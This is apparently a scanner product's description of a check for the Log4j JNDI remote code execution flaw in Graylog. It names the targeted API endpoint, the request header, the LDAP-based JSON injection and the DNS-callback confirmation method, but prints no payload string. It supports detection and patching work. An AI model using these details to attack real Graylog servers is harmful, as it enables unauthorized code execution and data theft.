Graylog Remote Code Execution Scanner

Graylog is an open-source log management platform used by IT operations and developers for monitoring, analyzing, and visualizing data. The software aggregates and searches through large amounts of log data from various sources, helping organizations to improve their system security and performance. Deployed across many enterprise environments, Graylog aids in real-time log collection, storage, and analysis, creating valuable insights into application and system behaviors. Its user-friendly interface and scalable architecture make it a popular choice among businesses needing a robust logging solution. The software is utilized across different sectors to enhance security protocols, audit compliance, and streamline troubleshooting processes. Moreover, Graylog's extendable framework allows for seamless integration with various external systems and services.

The Remote Code Execution (RCE) vulnerability detected within Graylog leverages the widely used Apache Log4j 2 library. This flaw allows attackers to execute arbitrary code through maliciously constructed log messages. The vulnerability primarily affects Log4j versions prior to 2.15.0, except for the secure releases 2.12.2, 2.12.3, and 2.3.1. Exploitation occurs when attack vectors manipulate log message parameters to reference attacker-controlled endpoints over LDAP and other JNDI-related networks. This security loophole enables unauthorized users to inject and execute remote commands on the vulnerable server. The critical nature of this flaw lies in its ability to exploit any system that records or processes logs using the susceptible Log4j versions.

Delving into the technicalities, the vulnerability specifically exploits the JNDI (Java Naming and Directory Interface) features present in Log4j configurations, log messages, and parameters. This manipulation leverages malicious entries passed as user inputs in log data which are subsequently processed by the application. The scanner targets the API endpoint `/api/system/sessions`, sends request headers including `X-Requested-With`, and crafts LDAP-based exploit strings injected through JSON payloads. These are designed to trigger DNS callbacks via the `interactsh-url` parameter indicating a successful code execution attempt. The scanner verifies these callbacks through stringent match conditions, including specific header word checks and regex-based DNS log analysis.

If exploited, this vulnerability allows destructive actions ranging from data theft, unauthorized server access, to deploying malware. Attackers could gain control of the Graylog server, leading to potential lateral movement within the network. Successful exploitation would compromise data integrity, confidentiality, and system availability, leaving organizations exposed to further sophisticated attacks. Besides immediate impacts, prolonged exposure may risk regulatory penalties due to breaches and non-compliance with privacy standards.

REFERENCES

• https://www.graylog.org/post/graylog-update-for-log4j
• https://logging.apache.org/log4j/2.x/security.html
• https://nvd.nist.gov/vuln/detail/CVE-2021-44228